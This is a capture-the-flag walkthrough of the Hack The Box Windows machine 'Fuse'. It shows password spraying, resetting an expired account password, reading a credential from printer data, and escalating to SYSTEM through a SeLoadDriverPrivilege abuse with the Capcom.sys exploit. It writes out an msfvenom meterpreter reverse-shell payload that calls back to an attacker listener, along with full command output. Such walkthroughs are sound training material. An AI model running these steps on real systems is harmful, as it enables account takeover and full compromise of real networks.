Hackthebox Fuse protected writeup by : https://0xprashant.github.io/posts/htb-fuse/
Introduction@Fuse:~$
Column | Details |
---|---|
Name | Fuse |
IP | 10.10.10.193 |
Points | 30 |
Os | Windows |
Difficulty | Medium |
Creator | aas |
Out On | 13 June 2020 |
Brief@Fuse:~$
Got few usernames from the files from the website
itself and making a custom wordlist
from the website itself using cewl
. Password Sparying using metasploit
on the smb protocol , Got the correct username and password . Changed the password using smbpasswd
and login to the rpcclient
. Enumerating about printers
. Got a password from the result
, Again password sparying using crackmapexec
on the winrm protocol got the username
associated with it .Logged in using evil-winrm
. The user is privileged to load the drivers as , And following an article compiling the necessary files using visual-studio
and exploiting the SeLoadDriverPrivilege
to get shell as administartor.
Summary :~$
- GOt domain from enum4linux
- Reading the
execl-files
got from website - Making a users.txt file for the users got from excel-files
- making a
custom-wordlist
using cewl from thewebsite
itself Bruteforce
the smb protocol using metasploit and medusa- USing smbpasswd to reset the password of the user
tlavel
- Enumerating shares
- Using
rpcclient
to enumerate users - Got
printer
information and apassword
from the enumprinters query - Login as
svc-print
- Got user.txt
- Privilege-escalation by abusing
SeLoadDriverPrivilege
- Compling all the files
- Generating a msf
malicious
file - Creating the registry key as the file capcom.sys using
eoploaddriver.exe
- Executing the ExploitCapcom.exe to run the
shell.exe
- Got shell as
admin
- Got root.txt
Pwned
➜ fuse evil-winrm -u Administrator -H 370ddcf45959b2293427baa70376e14e -i fuse.htb evil-winrm Evil-WinRM shell v2.3 Info: Establishing connection to remote endpoint
Recon
Nmap
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 |
➜ fuse nmap -sV -sC -v -T4 -oA scans/nmap.full -p- fuse.htb # Nmap 7.80 scan initiated Sat Jun 13 21:00:25 2020 as: nmap -sV -sC -v -T4 -oA scans/nmap.full -p- fuse.htb Nmap scan report for fuse.htb (10.10.10.193) Host is up (0.34s latency). Not shown: 65514 filtered ports PORT STATE SERVICE VERSION 53/tcp open domain? | fingerprint-strings: | DNSVersionBindReqTCP: | version |_ bind 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: | Supported Methods: OPTIONS TRACE GET HEAD POST |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: Site doesnt have a title (text/html). 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-06-14 01:19:23Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name) 445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: FABRICORP) 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 9389/tcp open mc-nmf .NET Message Framing 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49669/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49670/tcp open msrpc Microsoft Windows RPC 49672/tcp open msrpc Microsoft Windows RPC 49690/tcp open msrpc Microsoft Windows RPC 49743/tcp open msrpc Microsoft Windows RPC 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port53-TCP:V=7.80%I=7%D=6/13%Time=5EE5780A%P=x86_64-pc-linux-gnu%r(DNSV SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\ SF:x04bind\0\0\x10\0\x03"); Service Info: Host: FUSE; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 2h33m10s, deviation: 4h02m31s, median: 13m08s | smb-os-discovery: | OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3) | Computer name: Fuse | NetBIOS computer name: FUSE\x00 | Domain name: fabricorp.local | Forest name: fabricorp.local | FQDN: Fuse.fabricorp.local |_ System time: 2020-06-13T18:21:53-07:00 | smb-security-mode: | account_used: <blank> | authentication_level: user | challenge_response: supported |_ message_signing: required | smb2-security-mode: | 2.02: |_ Message signing enabled and required | smb2-time: | date: 2020-06-14T01:21:55 |_ start_date: 2020-06-13T19:13:43 Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sat Jun 13 21:11:22 2020 -- 1 IP address (1 host up) scanned in 657.60 seconds |
So many ports are opened , interesting
ones are DNS , SMB ,Winrm , HTTP
Port 80 (HTTP)
the fuse.htb
is redirected to fuse.fabricorp.local
…. added it to the /etc/hosts file
Fter adding and doing a refresh
There is a papercut
runningb on this http
port . And there are also some excel
files
Download the Excel files
I downloaded all the three
files and opened them
1.
2.
3.
These files contain some usernames
i just extracted them all and save them in a users.txt
SMB Protocol
I tried to check if anonymous
login is allowed or not on smb
1 2 3 4 5 6 7 |
➜ prashant smbclient -L fuse.htb Enter WORKGROUP\roots password: Anonymous login successful Sharename Type Comment --------- ---- ------- SMB1 disabled -- no workgroup available |
Okay…so the anonymous
login is allowed but we can not list the shares .
Enum4linux
1 2 |
➜ prashant enum4linux fuse.htb Domain Name: FABRICORP |
Got nothing rather than a domain-name
: FABRICORP
Password Spraying on smb protocol
users.txt
1 2 3 4 5 |
➜ fuse cat users.txt
pmerton
tlavel
sthompson
bhult
|
These excel-files contain some usernames
i just extracted them all and save them in a users.txt
Now what ??
After some time i decided to build a custom-wordlist
from the website using cewl so i can bruteforce the login on smb
protocol
1 2 |
➜ fuse cewl -d 5 -m 3 -w wordlist http://fuse.fabricorp.local/papercut/logs/html/index.htm --with-numbers CeWL 5.4.8 (Inclusion) Robin Wood (robin@digi.ninja) (https://digi.ninja/) |
i tried password spraying
with the same users.txt file using metasploit on the smb
protocol
Using metasploit
The module i used in msf is auxiliary/scanner/smb/smb_login
to bruteforce the login
1 2 3 4 5 6 7 8 9 10 11 12 |
msf5 > use auxiliary/scanner/smb/smb_login msf5 auxiliary(scanner/smb/smb_login) > set pass_file wordlist pass_file => wordlist msf5 auxiliary(scanner/smb/smb_login) > set USER_file users.txt USER_file => users.txt msf5 auxiliary(scanner/smb/smb_login) > set RHOSTS fuse.htb RHOSTS => fuse.htb msf5 auxiliary(scanner/smb/smb_login) > msf5 auxiliary(scanner/smb/smb_login) > run [+] 10.10.10.193:445 - 10.10.10.193:445 - Success: '.\tlavel:Fabricorp01' [+] 10.10.10.193:445 - 10.10.10.193:445 - Success: '.\bhult:Fabricorp01' |
Using medusa
1 2 3 4 5 6 7 |
➜ fuse medusa -h fuse.htb -U users.txt -P wordlist -M smbnt Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net> ACCOUNT FOUND: [smbnt] Host: fuse.htb User: tlavel Password: Fabricorp01 [SUCCESS (0x000224:STATUS_PASSWORD_MUST_CHANGE)] ACCOUNT FOUND: [smbnt] Host: fuse.htb User: bhult Password: Fabricorp01 [SUCCESS (0x000224:STATUS_PASSWORD_MUST_CHANGE)] |
As i can see now that password is Fabricorp01
on which it got SUCCESS for both the users tlavel
and bhult
but it also says STATUS_PASSWORD_MUST_CHANGE
.
Login using smbclient
1 2 3 |
➜ fuse smbclient -L fuse.htb -U tlavel Enter WORKGROUP\tlavel's password: session setup failed: NT_STATUS_LOGON_FAILURE |
But i got the same error as got previously in medusa
Well we can reset the password
using smbpasswd of a remote machine also if we know its old password…And since i know it so i can simply chnage the password
Changing smb password
1 2 3 4 5 |
➜ fuse smbpasswd -r fuse.htb -U tlavel Old SMB password: New SMB password: Retype new SMB password: Password changed for user tlavel on fuse.htb. |
And yeah now i can list shares
as user tlavel
1 2 3 4 5 6 7 8 9 10 11 12 13 |
➜ fuse smbclient -L fuse.htb -U tlavel Enter WORKGROUP\tlavels password: Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share HP-MFT01 Printer HP-MFT01 IPC$ IPC Remote IPC NETLOGON Disk Logon server share print$ Disk Printer Drivers SYSVOL Disk Logon server share SMB1 disabled -- no workgroup available |
After enumerating
all the shares got nothing actually or i cant figured out thae thing i need.
Enumerating using rpcclient
I can reset
the password again and login myself to rpcclient
1 2 3 |
➜ fuse rpcclient -U FABRICORP\\tlavel 10.10.10.193 Enter FABRICORP\tlavel's password: rpcclient $> |
Enum users
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
rpcclient $> enumdomusers user:[Administrator] rid:[0x1f4] user:[Guest] rid:[0x1f5] user:[krbtgt] rid:[0x1f6] user:[DefaultAccount] rid:[0x1f7] user:[svc-print] rid:[0x450] user:[bnielson] rid:[0x451] user:[sthompson] rid:[0x641] user:[tlavel] rid:[0x642] user:[pmerton] rid:[0x643] user:[svc-scan] rid:[0x645] user:[bhult] rid:[0x1bbd] user:[dandrews] rid:[0x1bbe] user:[mberbatov] rid:[0x1db1] user:[astein] rid:[0x1db2] user:[dmuir] rid:[0x1db3] rpcclient $> |
Okay…so i got some usernames
here and i saved them to another file called users
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 |
rpcclient $> enumprivs found 35 privileges SeCreateTokenPrivilege 0:2 (0x0:0x2) SeAssignPrimaryTokenPrivilege 0:3 (0x0:0x3) SeLockMemoryPrivilege 0:4 (0x0:0x4) SeIncreaseQuotaPrivilege 0:5 (0x0:0x5) SeMachineAccountPrivilege 0:6 (0x0:0x6) SeTcbPrivilege 0:7 (0x0:0x7) SeSecurityPrivilege 0:8 (0x0:0x8) SeTakeOwnershipPrivilege 0:9 (0x0:0x9) SeLoadDriverPrivilege 0:10 (0x0:0xa) SeSystemProfilePrivilege 0:11 (0x0:0xb) SeSystemtimePrivilege 0:12 (0x0:0xc) SeProfileSingleProcessPrivilege 0:13 (0x0:0xd) SeIncreaseBasePriorityPrivilege 0:14 (0x0:0xe) SeCreatePagefilePrivilege 0:15 (0x0:0xf) SeCreatePermanentPrivilege 0:16 (0x0:0x10) SeBackupPrivilege 0:17 (0x0:0x11) SeRestorePrivilege 0:18 (0x0:0x12) SeShutdownPrivilege 0:19 (0x0:0x13) SeDebugPrivilege 0:20 (0x0:0x14) SeAuditPrivilege 0:21 (0x0:0x15) SeSystemEnvironmentPrivilege 0:22 (0x0:0x16) SeChangeNotifyPrivilege 0:23 (0x0:0x17) SeRemoteShutdownPrivilege 0:24 (0x0:0x18) SeUndockPrivilege 0:25 (0x0:0x19) SeSyncAgentPrivilege 0:26 (0x0:0x1a) SeEnableDelegationPrivilege 0:27 (0x0:0x1b) SeManageVolumePrivilege 0:28 (0x0:0x1c) SeImpersonatePrivilege 0:29 (0x0:0x1d) SeCreateGlobalPrivilege 0:30 (0x0:0x1e) SeTrustedCredManAccessPrivilege 0:31 (0x0:0x1f) SeRelabelPrivilege 0:32 (0x0:0x20) SeIncreaseWorkingSetPrivilege 0:33 (0x0:0x21) SeTimeZonePrivilege 0:34 (0x0:0x22) SeCreateSymbolicLinkPrivilege 0:35 (0x0:0x23) SeDelegateSessionUserImpersonatePrivilege 0:36 (0x0:0x24) rpcclient $> |
The user have some pretty good privileges
on the machine
The website was about printers
, Better if we just do some enum on printers.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 |
adddriver Add a print driver addprinter Add a printer deldriver Delete a printer driver deldriverex Delete a printer driver with files enumdata Enumerate printer data enumdataex Enumerate printer data for a key enumkey Enumerate printer keys enumjobs Enumerate print jobs getjob Get print job setjob Set print job enumports Enumerate printer ports enumdrivers Enumerate installed printer drivers enumprinters Enumerate printers getdata Get print driver data getdataex Get printer driver data with keyname getdriver Get print driver information getdriverdir Get print driver upload directory getdriverpackagepath Get print driver package download directory getprinter Get printer info openprinter Open printer handle openprinter_ex Open printer handle setdriver Set printer driver getprintprocdir Get print processor directory addform Add form setform Set form getform Get form deleteform Delete form enumforms Enumerate forms setprinter Set printer comment setprintername Set printername setprinterdata Set REG_SZ printer data rffpcnex Rffpcnex test printercmp Printer comparison test enumprocs Enumerate Print Processors enumprocdatatypes Enumerate Print Processor Data Types enummonitors Enumerate Print Monitors createprinteric Create Printer IC |
There are some pretty good commands
regarding the printers
enumprinters Enumerate printers
I cant list and enumerate the printers
by using enumprinters
1 2 3 4 5 6 7 |
rpcclient $> enumprinters flags:[0x800000] name:[\\10.10.10.193\HP-MFT01] description:[\\10.10.10.193\HP-MFT01,HP Universal Printing PCL 6,Central (Near IT, scan2docs password: $fab@s3Rv1ce$1)] comment:[] rpcclient $> |
And herew I got lucky
, Got a password here $fab@s3Rv1ce$1
Username spraying on winrm protocol
Now…since the winrm
port is opened , And i can use crackmapexec
or metasploit to spray usernames that i got from the rpcclient
using enumdomusers
Using metasploit
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 |
msf5 auxiliary(scanner/winrm/winrm_login) > set PASSWORD '$fab@s3Rv1ce$1' PASSWORD => $fab@s3Rv1ce$1 msf5 auxiliary(scanner/winrm/winrm_login) > set USER_FILE users USER_FILE => users msf5 auxiliary(scanner/winrm/winrm_login) > set RHOSTS 10.10.10.193 RHOSTS => 10.10.10.193 msf5 auxiliary(scanner/winrm/winrm_login) > msf5 auxiliary(scanner/winrm/winrm_login) > run [!] No active DB -- Credential data will not be saved! [-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\DefaultAccount:$fab@s3Rv1ce$1 (Incorrect: ) [-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\Administrator:$fab@s3Rv1ce$1 (Incorrect: ) [-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\krbtgt:$fab@s3Rv1ce$1 (Incorrect: ) [-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\pmerton:$fab@s3Rv1ce$1 (Incorrect: ) [-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\tlavel:$fab@s3Rv1ce$1 (Incorrect: ) [-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\sthompson:$fab@s3Rv1ce$1 (Incorrect: ) [-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\bhult:$fab@s3Rv1ce$1 (Incorrect: ) [-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\bnielson:$fab@s3Rv1ce$1 (Incorrect: ) [-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\dandrews:$fab@s3Rv1ce$1 (Incorrect: ) [-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\mberbatov:$fab@s3Rv1ce$1 (Incorrect: ) [-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\astein:$fab@s3Rv1ce$1 (Incorrect: ) [-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\dmuir:$fab@s3Rv1ce$1 (Incorrect: ) [-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\svc-scan:$fab@s3Rv1ce$1 (Incorrect: ) [+] 10.10.10.193:5985 - Login Successful: WORKSTATION\svc-print:$fab@s3Rv1ce$1 [-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\Guest:$fab@s3Rv1ce$1 (Incorrect: ) [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed |
using crackmapexec
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 |
➜ fuse crackmapexec winrm -u users -p '$fab@s3Rv1ce$1' -d FABRICORP fuse.htb WINRM 10.10.10.193 5985 fuse.htb [*] http://10.10.10.193:5985/wsman WINRM 10.10.10.193 5985 fuse.htb [-] FABRICORP\DefaultAccount:$fab@s3Rv1ce$1 "Failed to authenticate the user DefaultAccount with ntlm" WINRM 10.10.10.193 5985 fuse.htb [-] FABRICORP\Administrator:$fab@s3Rv1ce$1 "Failed to authenticate the user Administrator with ntlm" WINRM 10.10.10.193 5985 fuse.htb [-] FABRICORP\krbtgt:$fab@s3Rv1ce$1 "Failed to authenticate the user krbtgt with ntlm" WINRM 10.10.10.193 5985 fuse.htb [-] FABRICORP\pmerton:$fab@s3Rv1ce$1 "Failed to authenticate the user pmerton with ntlm" WINRM 10.10.10.193 5985 fuse.htb [-] FABRICORP\tlavel:$fab@s3Rv1ce$1 "Failed to authenticate the user tlavel with ntlm" WINRM 10.10.10.193 5985 fuse.htb [-] FABRICORP\sthompson:$fab@s3Rv1ce$1 "Failed to authenticate the user sthompson with ntlm" WINRM 10.10.10.193 5985 fuse.htb [-] FABRICORP\bhult:$fab@s3Rv1ce$1 "Failed to authenticate the user bhult with ntlm" WINRM 10.10.10.193 5985 fuse.htb [-] FABRICORP\bnielson:$fab@s3Rv1ce$1 "Failed to authenticate the user bnielson with ntlm" WINRM 10.10.10.193 5985 fuse.htb [-] FABRICORP\dandrews:$fab@s3Rv1ce$1 "Failed to authenticate the user dandrews with ntlm" WINRM 10.10.10.193 5985 fuse.htb [-] FABRICORP\mberbatov:$fab@s3Rv1ce$1 "Failed to authenticate the user mberbatov with ntlm" WINRM 10.10.10.193 5985 fuse.htb [-] FABRICORP\astein:$fab@s3Rv1ce$1 "Failed to authenticate the user astein with ntlm" WINRM 10.10.10.193 5985 fuse.htb [-] FABRICORP\dmuir:$fab@s3Rv1ce$1 "Failed to authenticate the user dmuir with ntlm" WINRM 10.10.10.193 5985 fuse.htb [-] FABRICORP\svc-scan:$fab@s3Rv1ce$1 "Failed to authenticate the user svc-scan with ntlm" WINRM 10.10.10.193 5985 fuse.htb [+] FABRICORP\svc-print:$fab@s3Rv1ce$1 (Pwn3d!) |
The user is svc-print
and i can login myself to the machine using evil-winrm
1 2 3 4 5 6 7 8 |
➜ fuse evil-winrm -u svc-print -p '$fab@s3Rv1ce$1' -i fuse.htb Evil-WinRM shell v2.3 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\svc-print\Documents> whoami fabricorp\svc-print |
Got user.txt
1 2 |
*Evil-WinRM* PS C:\Users\svc-print\desktop> type user.txt 3148b09cce76eee40d9bc602744269c1 |
Privilege escaltion
Now its time for escalating the privileges
whoami /all
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 |
*Evil-WinRM* PS C:\Users\svc-print\desktop> whoami /all USER INFORMATION ---------------- User Name SID =================== ============================================== fabricorp\svc-print S-1-5-21-2633719317-1471316042-3957863514-1104 GROUP INFORMATION ----------------- Group Name Type SID Attributes ========================================== ================ ============================================== ================================================== Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group BUILTIN\Print Operators Alias S-1-5-32-550 Mandatory group, Enabled by default, Enabled group BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group FABRICORP\IT_Accounts Group S-1-5-21-2633719317-1471316042-3957863514-1604 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group Mandatory Label\High Mandatory Level Label S-1-16-12288 PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ============================== ======= SeMachineAccountPrivilege Add workstations to domain Enabled SeLoadDriverPrivilege Load and unload device drivers Enabled SeShutdownPrivilege Shut down the system Enabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Enabled USER CLAIMS INFORMATION ----------------------- User claims unknown. Kerberos support for Dynamic Access Control on this device has been disabled. *Evil-WinRM* PS C:\Users\svc-print\desktop> |
The permission seems very suspicious
1 |
SeLoadDriverPrivilege Load and unload device drivers Enabled |
A quick google-search show me a good article on this
https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/
In this article its is shown that we cal load
our own drivers and we can run a specific command as admin
since we are already priviled to do it…
Compiling files
What i am gonna do is first compile both the two files
eoploaddriver.cpp
https://raw.githubusercontent.com/TarlogicSecurity/EoPLoadDriver/master/eoploaddriver.cpp
ExploitCapcom.cpp
https://github.com/tandasat/ExploitCapcom
I compiled both the files using Visual-studio
and got the exe files as obvious
We need to specify our command in the files ExploitCapcom.cpp
at the line 292 in function Launchshell()
1 2 3 |
static bool LaunchShell() { TCHAR CommandLine[] = TEXT("C:\\Windows\\system32\\cmd.exe"); |
I changed the command to mine that will be a shell.exe
so i can run my malicious binary created by msfvenom
1 2 3 |
static bool LaunchShell() { TCHAR CommandLine[] = TEXT("C:\\test\\shell.exe"); |
And one more file that is capcom.sys
https://github.com/FuzzySecurity/Capcom-Rootkit/blob/master/Driver/Capcom.sys
Now first we need to create a shell.exe
using msfvenom
Creating the malicious file
1 2 3 4 5 6 |
➜ files msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.4 LPORT=4444 -f exe > shell.exe [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder or badchars specified, outputting raw payload Payload size: 341 bytes Final size of exe file: 73802 bytes |
And then upload all the four files to the machine
Uplaoding files
Uploading files
After uploading all the four files….
Now Create the registry key under HKEY_CURRENT_USER (HKCU) and set driver configuration settings
The driver will be the file capcom.sys
and its absolute path
Exploitation
1 2 3 4 5 |
*Evil-WinRM* PS C:\test> .\eoploaddriver.exe System\CurrentControlSet\MyService C:\test\capcom.sys [+] Enabling SeLoadDriverPrivilege [+] SeLoadDriverPrivilege Enabled [+] Loading Driver: \Registry\User\S-1-5-21-2633719317-1471316042-3957863514-1104\System\CurrentControlSet\MyService NTSTATUS: 00000000, WinError: 0 |
Now start listner
on metasploit
and run the file .\ExploitCapcom.exe
for the final exploitation
Execute the
NTLoadDriver
function, specifying the registry key previously created
1 2 3 4 5 6 7 8 9 |
*Evil-WinRM* PS C:\test> .\ExploitCapcom.exe [*] Capcom.sys exploit [*] Capcom.sys handle was obtained as 0000000000000064 [*] Shellcode was placed at 000002B6CF0B0008 [+] Shellcode was executed [+] Token stealing was successful [+] The SYSTEM shell was launched [*] Press any key to exit this program *Evil-WinRM* PS C:\test> |
And on our listener
we got the shell as admin
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 |
msf5 exploit(multi/handler) > run [*] Started reverse TCP handler on 10.10.14.4:4444 [*] Sending stage (176195 bytes) to 10.10.10.193 [*] Meterpreter session 1 opened (10.10.14.4:4444 -> 10.10.10.193:50134) at 2020-06-17 02:27:11 -0400 meterpreter > shell Process 576 created. Channel 1 created. Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved. C:\test>whoami whoami nt authority\system |
Got root.txt
1 2 3 4 5 |
C:\Users\Administrator\Desktop>type root.txt type root.txt 39bb8e320aecfcdd345fc2e7be64ceb7 C:\Users\Administrator\Desktop> |
And we pwned it …….
If u liked the writeup.Support a Poor Student to Get the OSCP-Cert
Donation for OSCP
If you want to get notified as soon as i upload something new to my
blog
So just click on the bell icon you are seeing on the right side – > and allow pushnotification
Resources
Topic | Url |
---|---|
Article on seloaddriverprivilege | https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/ |
eoploaddriver.cpp | https://raw.githubusercontent.com/TarlogicSecurity/EoPLoadDriver/master/eoploaddriver.cpp |
ExploitCapcom.cpp | https://github.com/tandasat/ExploitCapcom |
capcom.sys | https://github.com/FuzzySecurity/Capcom-Rootkit/blob/master/Driver/Capcom.sys |
below puckie’s way
1st a nmap scan
E:\PENTEST>nmap 10.10.10.193 Starting Nmap 7.70 ( https://nmap.org ) at 2020-06-17 11:38 W. Europe Summer Time Nmap scan report for fuse.fabricorp.local (10.10.10.193) Host is up (0.089s latency). Not shown: 988 filtered ports PORT STATE SERVICE 53/tcp open domain 80/tcp open http 88/tcp open kerberos-sec 135/tcp open msrpc 139/tcp open netbios-ssn 389/tcp open ldap 445/tcp open microsoft-ds 464/tcp open kpasswd5 593/tcp open http-rpc-epmap 636/tcp open ldapssl 3268/tcp open globalcatLDAP 3269/tcp open globalcatLDAPssl Nmap done: 1 IP address (1 host up) scanned in 19.86 seconds E:\PENTEST>
enumerate more
root@kali:~/htb/fuse# nmap -p53,80,88,135,139,389,445,3389 -A -T4 fabricorp.local Starting Nmap 7.70 ( https://nmap.org ) at 2020-06-17 05:56 EDT Nmap scan report for fabricorp.local (10.10.10.193) Host is up (0.086s latency). rDNS record for 10.10.10.193: fuse.fabricorp.local PORT STATE SERVICE VERSION 53/tcp open domain? | fingerprint-strings: | DNSVersionBindReqTCP: | version |_ bind 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: Site doesn't have a title (text/html). 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-06-17 10:13:52Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name) 445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: FABRICORP) 3389/tcp filtered ms-wbt-server 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port53-TCP:V=7.70%I=7%D=6/17%Time=5EE9E8E5%P=x86_64-pc-linux-gnu%r(DNSV SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\ SF:x04bind\0\0\x10\0\x03"); Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): Microsoft Windows 2016|2012|2008|10 (91%) OS CPE: cpe:/o:microsoft:windows_server_2016 cpe:/o:microsoft:windows_server_2012 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_10:1607 Aggressive OS guesses: Microsoft Windows Server 2016 (91%), Microsoft Windows Server 2012 (85%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (85%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows 10 1607 (85%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: Host: FUSE; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 2h37m05s, deviation: 4h02m32s, median: 17m03s | smb-os-discovery: | OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3) | Computer name: Fuse | NetBIOS computer name: FUSE\x00 | Domain name: fabricorp.local | Forest name: fabricorp.local | FQDN: Fuse.fabricorp.local |_ System time: 2020-06-17T03:16:16-07:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: required | smb2-security-mode: | 2.02: |_ Message signing enabled and required | smb2-time: | date: 2020-06-17 06:16:14 |_ start_date: 2020-06-17 00:32:55 TRACEROUTE (using port 135/tcp) HOP RTT ADDRESS 1 85.26 ms 10.10.14.1 2 85.44 ms fuse.fabricorp.local (10.10.10.193) OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 189.81 seconds root@kali:~/htb/fuse#
.
=> users : pmerton , tlavel , bnielson
check for more users
E:\PENTEST>kerbrute_windows_amd64.exe userenum --dc fabricorp.local -d fabricorp userlist.txt __ __ __ / /_____ _____/ /_ _______ __/ /____ / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \ / ,< / __/ / / /_/ / / / /_/ / /_/ __/ /_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/ Version: v1.0.3 (9dad6e1) - 06/17/20 - Ronnie Flathers @ropnop 2020/06/17 12:06:02 > Using KDC(s): 2020/06/17 12:06:02 > fabricorp.local:88 2020/06/17 12:06:21 > [+] VALID USERNAME: administrator@fabricorp 2020/06/17 12:08:31 > [+] VALID USERNAME: Administrator@fabricorp 2020/06/17 12:16:07 > [+] VALID USERNAME: sthompson@fabricorp 2020/06/17 12:22:27 > [+] VALID USERNAME: fuse@fabricorp 2020/06/17 12:22:27 > [+] VALID USERNAME: bhult@fabricorp 2020/06/17 12:22:43 > Done! Tested 100000 usernames (5 valid) in 1001.177 seconds
combined
